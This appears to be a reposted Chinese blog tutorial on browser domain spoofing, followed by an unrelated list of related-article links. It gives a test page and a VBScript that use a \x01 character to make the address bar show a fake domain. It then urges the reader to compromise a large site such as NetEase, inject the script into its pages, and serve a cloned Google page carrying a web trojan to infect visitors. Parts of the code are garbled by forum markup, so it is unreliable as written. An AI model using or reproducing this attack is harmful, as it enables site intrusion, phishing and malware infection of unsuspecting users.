网络域名欺骗技术实现过程

简介:
网页 木马种植方案一直都存在很大的问题,当然 欺骗 需要技巧也需要时间,我们现在不需要那么麻烦的欺骗,本文就是教大家利用最新 浏览器 漏洞实现域名的欺骗..... 


前言 


域名欺骗有多种实现方法,本文所说的是利用客户端浏览器的漏洞来欺骗用户。 


多数浏览器都会存在这个漏洞,目前暂时还没相应的补丁。漏洞是这样的: 


当用户通过浏览器访问一个url,如果这个url是经过以下的格式构造的,那么浏览器实际将访问经过构造的恶意 页面 ,而用户浏览器的 地址 栏里所显示的将是虚假的url: 


url的构造格式为: 


说明: 


url_1为用户所看到的地址,地址中不可以带"/" 


special_char为一个特殊的字符,即ascii码为1的字符 


url_2为恶意页面地址 


利用过程 


首先请看这个测试页面: 


<html> 

<head> 

<title>域名欺骗技术实例</title> 

</head> 

<body link="#0000ff" alink="#0000ff" vlink="#0000ff"> 

你可以看看这两个链接有什么区别: 

<br> 

<h1>链接1: 

<script language="vbscript" src="deceive.vbs"> 

</script></h1> 

<h1>链接2: 

<a href="_blank ?> [url]www.163.com[/url] " target="_blank"> 

[url]http://www.163.com/[/url] "; target="_blank"  [url]http://ww[/url]  ... ";> 

[url]www.163.com[/url] </a> 

</h1> 

</body> 

</html> 


这个网页源代码,其中链接1指向了一个vbs脚本,而链接2指向的是163站点。如果我们把连接一的vbs脚本改成下列代码: 


''''''''''''''''''deceive.vbs'''''''''''''''''''' 

'(以下请根据实际情况自行修改:) 

url1="http://www.163.com/" 

url2="http://www.google.com/" 

text="http://www.163.com/" 

url="_blank ?>http://";&url1&chr(1)& ... p;url2&"" 

dn="/" 

mouseover=" :window.status='_blank ?> 

http://";&url1&dn&"'""" 

mouseout=" :window.status=''""" 

click=" :navigate('"&url&"')""" 

style="style=""cursor:hand""" 

tag="<span "&style&" "&mouseover&" "&mouseout&" "&click&"> 

<font color=""#0000ff""><u>"&text&"</u> 

</font></span>" 

document.write tag 

'说明: 

'url1是用来欺骗用户的地址. 

'url2是实际访问的地址,可以是网页 木马 、恶意网页等. 

'text是链接的文字. 

'注意:(以上欺骗地址及实际地址不可以加"http://") 

'''''''''''''''''''''''''''''''''''''''cuts here'''''''''''''''''''''''''''''''''''''''''''''''' 


现在大家看到了吧~~当我们点击这个测试页面的时候,链接1指向的是google.com,而且状态栏和地址栏里都显示"_blank> [url]http://www.163.com/[/url] ",链接2却指向163.com。你也许感到不可思议,但这就是域名欺骗漏洞的魅力。 


我们可以想象,如果以上的测试页面中的链接1指向的不是google.com,而是我们的网页木马,那就...... 


不过,一个普通的个人网站没人会看的,这就需要我们把这种假链接添加到别的大网站的页面之中。假设我们入侵了一个比较大的网站,比如网易(哇~~~~~~这时候一只菜鸟推着一车砖头,看着我......)。这时候就可以把它的页面给改了。 


比如有一个文字链接,我们就可以把代码中的"<a href="xxxxx.htm">xxxxxx</a>"改为我们自己的代码:"<script language="vbscript" src="deceive.vbs"></script>"。看到src属性里的deceive.vbs了吗 ?我们要编辑好这个文件,然后上传到要修改的页面目录下。 


这样还不行,我们还要把自己的木马网页的界面修改一下。也就是把原来链接到的页面加入到我们自己的木马网页,并且我们的木马网页里的所有链接等内容要和原来的页面一样,否则就会引起用户的怀疑。现在,我们把google网站的首页源代码全部复制下来,添加到我们的网页木马。把复制下来的代码中的图片或者是链接的文件都修改完整,比如logo.gif改为_blank>/UpLoadFiles/NewsPhoto/comalogo.gif,否则网页就和原来的不一样了(图片显示为红色的×,链接也失效),因为用户打开的是你的站点,而你的站点中并没有logo.gif。都修改好后就可以保存文件了。上传到你的网页空间里。 


至此,我们的工作已经完成。喝一杯咖啡,休息一会...... 


当我们进入这个网站后,点击我们修改过的连接,你会发现和原来的页面几乎就一模一样(当然,也有些细微的区别,不过一般很难觉察)。就当人家在浏览这个网页的时候,他已经在不知不觉中中了木马,而你也开心地笑呢!~





















本文转自starger51CTO博客,原文链接: http://blog.51cto.com/starger/17141,如需转载请自行联系原作者

相关文章
|
4月前
|
调度 Python
探索Python高级并发与网络编程技术。
可以看出,Python的高级并发和网络编程极具挑战,却也饱含乐趣。探索这些技术,你将会发现:它们好比是Python世界的海洋,有穿越风暴的波涛,也有寂静深海的奇妙。开始旅途,探索无尽可能吧!
105 15
|
4月前
|
机器学习/深度学习 算法 PyTorch
Perforated Backpropagation:神经网络优化的创新技术及PyTorch使用指南
深度学习近年来在多个领域取得了显著进展,但其核心组件——人工神经元和反向传播算法自提出以来鲜有根本性突破。穿孔反向传播(Perforated Backpropagation)技术通过引入“树突”机制,模仿生物神经元的计算能力,实现了对传统神经元的增强。该技术利用基于协方差的损失函数训练树突节点,使其能够识别神经元分类中的异常模式,从而提升整体网络性能。实验表明,该方法不仅可提高模型精度(如BERT模型准确率提升3%-17%),还能实现高效模型压缩(参数减少44%而无性能损失)。这一革新为深度学习的基础构建模块带来了新的可能性,尤其适用于边缘设备和大规模模型优化场景。
130 16
Perforated Backpropagation:神经网络优化的创新技术及PyTorch使用指南
|
4月前
|
监控 算法 JavaScript
基于 JavaScript 图算法的局域网网络访问控制模型构建及局域网禁止上网软件的技术实现路径研究
本文探讨局域网网络访问控制软件的技术框架,将其核心功能映射为图论模型,通过节点与边表示终端设备及访问关系。以JavaScript实现DFS算法,模拟访问权限判断,优化动态策略更新与多层级访问控制。结合流量监控数据,提升网络安全响应能力,为企业自主研发提供理论支持,推动智能化演进,助力数字化管理。
96 4
|
5月前
|
存储 双11 数据中心
数据中心网络关键技术,技术发明一等奖!
近日,阿里云联合清华大学与中国移动申报的“性能可预期的大规模数据中心网络关键技术与应用”项目荣获中国电子学会技术发明一等奖。该项目通过端网融合架构,实现数据中心网络性能的可预期性,在带宽保障、时延控制和故障恢复速度上取得重大突破,显著提升服务质量。成果已应用于阿里云多项产品及重大社会活动中,如巴黎奥运会直播、“双十一”购物节等,展现出国际领先水平。
|
5月前
|
安全 网络安全 定位技术
网络通讯技术:HTTP POST协议用于发送本地压缩数据到服务器的方案。
总的来说,无论你是一名网络开发者,还是普通的IT工作人员,理解并掌握POST方法的运用是非常有价值的。它就像一艘快速,稳定,安全的大船,始终为我们在网络海洋中的冒险提供了可靠的支持。
155 22
|
5月前
|
存储 监控 算法
基于 Python 哈希表算法的局域网网络监控工具:实现高效数据管理的核心技术
在当下数字化办公的环境中,局域网网络监控工具已成为保障企业网络安全、确保其高效运行的核心手段。此类工具通过对网络数据的收集、分析与管理,赋予企业实时洞察网络活动的能力。而在其运行机制背后,数据结构与算法发挥着关键作用。本文聚焦于 PHP 语言中的哈希表算法,深入探究其在局域网网络监控工具中的应用方式及所具备的优势。
141 7
|
6月前
|
缓存 网络协议 API
掌握网络通信协议和技术:开发者指南
本文探讨了常见的网络通信协议和技术,如HTTP、SSE、GraphQL、TCP、WebSocket和Socket.IO,分析了它们的功能、优劣势及适用场景。开发者需根据应用需求选择合适的协议,以构建高效、可扩展的应用程序。同时,测试与调试工具(如Apipost)能助力开发者在不同网络环境下优化性能,提升用户体验。掌握这些协议是现代软件开发者的必备技能,对项目成功至关重要。
|
6月前
|
缓存 监控 算法
基于 C# 网络套接字算法的局域网实时监控技术探究
在数字化办公与网络安全需求增长的背景下,局域网实时监控成为企业管理和安全防护的关键。本文介绍C#网络套接字算法在局域网实时监控中的应用,涵盖套接字创建、绑定监听、连接建立和数据传输等操作,并通过代码示例展示其实现方式。服务端和客户端通过套接字进行屏幕截图等数据的实时传输,保障网络稳定与信息安全。同时,文章探讨了算法的优缺点及优化方向,如异步编程、数据压缩与缓存、错误处理与重传机制,以提升系统性能。
120 2
|
7月前
|
监控 安全 网络安全
静态长效代理IP的技术创新与网络安全体现在哪些方面?
随着数字化发展,网络安全和隐私保护成为核心需求。静态长效代理IP通过智能路由、动态IP池管理、加密技术、负载均衡及API集成等创新,提升数据传输速度与安全性。它在信息安全保护、访问控制、数据传输保护及网络监控等方面发挥重要作用,为各行业提供高效、安全的网络解决方案,应用前景广阔。
143 5

热门文章

最新文章